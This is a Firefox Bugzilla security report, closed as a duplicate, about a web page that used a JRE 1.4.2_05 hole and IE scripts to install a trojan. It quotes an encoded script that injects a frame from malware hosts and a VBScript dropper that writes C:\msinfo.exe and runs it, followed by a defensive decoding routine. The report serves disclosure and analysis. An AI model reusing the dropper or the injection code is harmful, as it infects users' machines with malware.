Closed Bug 275429 Opened 20 years ago Closed 20 years ago

JRE 1.4.2_05 exploit in the wild

Categories

(Firefox :: General, defect)

x86
Windows XP
defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 271559

People

(Reporter: jshpro2, Assigned: bugzilla)

References

()

Details

I believe I have found a possible exploit. While browsing the web I came across
a page that caused several notifications from my virus scanner:

http://4arrowsoutfitters.com/crack/tradewinds/unlock/code/
(Go to the page at your own risk)

I noticed the line:
var str="%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B";
in the JavaScript; upon decoding that line, it was printing a frame to:

http://www.t058.com/inst/index.php?id=28129&c=Uji1i1ar0BI35vyd7nSV5v6JMUUFI0O3

This page appeared as if it was loading a Java class to run some trivial code.
I found code that looked like it was running some sort of exploit using
VBScript, JavaScript, and/or Java.

An excerpt of one of the VBScripts it was running is:

    ' c0 (not included in this excerpt) holds the payload as a hex string;
    ' this loop turns it, two characters at a time, into raw bytes in h0
    h0 = ""
    i = 1
    Do While i < Len(c0)
        h0 = h0 & chr(cint("&h" & mid(c0, i, 2)))
        i = i + 2
    Loop

    ' write the decoded bytes out as C:\msinfo.exe and execute it
    set wsh = CreateObject("WScript.Shell")
    path = "C:\\"
    set fs = CreateObject("Scripting.FileSystemObject")
    set ts = fs.CreateTextFile(path + "msinfo.exe", true, false)
    ts.Write(h0)
    ts.Close()
    wsh.Run(path + "msinfo.exe")
    self.close()

It looks like they are downloading an executable to the victim's computer
(trojan.bytedownloader)... I sent the code to a friend of mine and when he ran
it, he got a Windows XP error that critical system files had been replaced with
unknown files and that he needed to reinstall. I have tested this on my machine;
I only get a notification from Norton that the file was prevented from
downloading. It appears as if the author of the code has also implemented a
counter to see how many computers have been infected. I do not intend to do any
further investigation on my part. The reason I am reporting this to Firefox
instead of reporting it to Sun Microsystems or Microsoft is that Firefox
should have some security measure in place to prevent code like this from even
running. Firefox is known for its security and I would expect an exploit like
this to affect IE only; I hope this issue is resolved shortly. I do not have the
time or motivation to send this report to any other places, so if the correct
place for me to contact was a virus center or something like that, you have
permission to forward it on with my email address.

Regards,
Josh
jshpro2@gmail.com
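
The two obfuscation layers quoted in the report can be unpacked offline without running any of the page's code. The block below is an added example and is not code from the bug report or from the site it describes. It decodes the %XX-encoded literal exactly as quoted (the decoded text is a document.write of a frame whose src points at www.rb37.com/cnt/processor; the t058.com address given above is where that frame led when loaded) and re-implements the VBScript hex-to-bytes loop so the would-be msinfo.exe can be inspected instead of written to disk and run. The hex blob c0 is not in the excerpt, so the sample blob here is constructed, with an "MZ" header and filler bytes.

```javascript
// Added example: static decoding of the obfuscation described in the report.

// Layer 1: the exact %XX-encoded literal quoted by the reporter.
const ENCODED_STR = "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B";

// Equivalent of the legacy unescape(): each %XX pair becomes one character,
// everything else passes through. Hand-rolled so nothing is ever eval'd.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Pull the src of every <frame>/<iframe> out of decoded markup.
function extractFrameSources(markup) {
  const out = [];
  const re = /<(?:i?frame)\b[^>]*\bsrc\s*=\s*(["'])(.*?)\1/gi;
  let m;
  while ((m = re.exec(markup)) !== null) out.push(m[2]);
  return out;
}

// Layer 2: the VBScript dropper converts a hex string c0 into bytes with
//   i = 1 : Do While i < Len(c0) : h0 = h0 & chr(cint("&h" & mid(c0, i, 2))) : i = i + 2
// This mirrors that loop (1-based index, step 2, trailing odd char dropped)
// but returns the bytes for inspection rather than writing C:\msinfo.exe.
function hexPairsToBytes(c0) {
  const bytes = [];
  for (let i = 1; i < c0.length; i += 2) {
    bytes.push(parseInt(c0.slice(i - 1, i + 1), 16));
  }
  return Uint8Array.from(bytes);
}

// A Windows executable starts with the DOS header magic "MZ".
function looksLikePE(bytes) {
  return bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a;
}

// Constructed sample blob (c0 is not in the report): "MZ" + filler bytes.
const SAMPLE_C0 = "4D5A90000300000004000000FFFF0000";

// Summarise both layers in one object for an analyst's notes.
function analyze(encodedJs, hexBlob) {
  const decoded = percentDecode(encodedJs);
  const bytes = hexPairsToBytes(hexBlob);
  return {
    decodedScript: decoded,
    frameSources: extractFrameSources(decoded),
    payloadLength: bytes.length,
    payloadIsPE: looksLikePE(bytes),
  };
}

console.log(analyze(ENCODED_STR, SAMPLE_C0));
```

Running this prints the decoded document.write call, the single frame URL it injects, and that the constructed 16-byte blob carries an MZ header; with a real c0 captured from the page, the same hexPairsToBytes output can be hashed or handed to a scanner without ever executing it.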

The t058.com site contains several exploit attempts aimed at IE (ms-its:
protocol object, the VBScript downloader you quote, a suspicious .gif file), and
a Java applet that apparently can take advantage of holes in Java at least up to
JRE 1.4.2_05 (from other reports). There was a recently announced vulnerability
in that JRE version; perhaps they use that.

Turning off Java will protect you. Upgrading to JRE 1.5 or 1.4.2_06 would
protect you if the exploit uses the known hole in 1.4.2_05, but that's less clear.

I've seen a couple of other sites that loaded the same trojan-laden frame from t058.com.

Really a JRE bug, but our users don't care whose fault it is. We want to roll
out a system to warn users about known vulnerabilities in 3rd party software.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Exploit in browser → JRE 1.4.2_05 exploit in the wild
Whiteboard: DUPEME

*** This bug has been marked as a duplicate of 271559 ***
Group: security
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME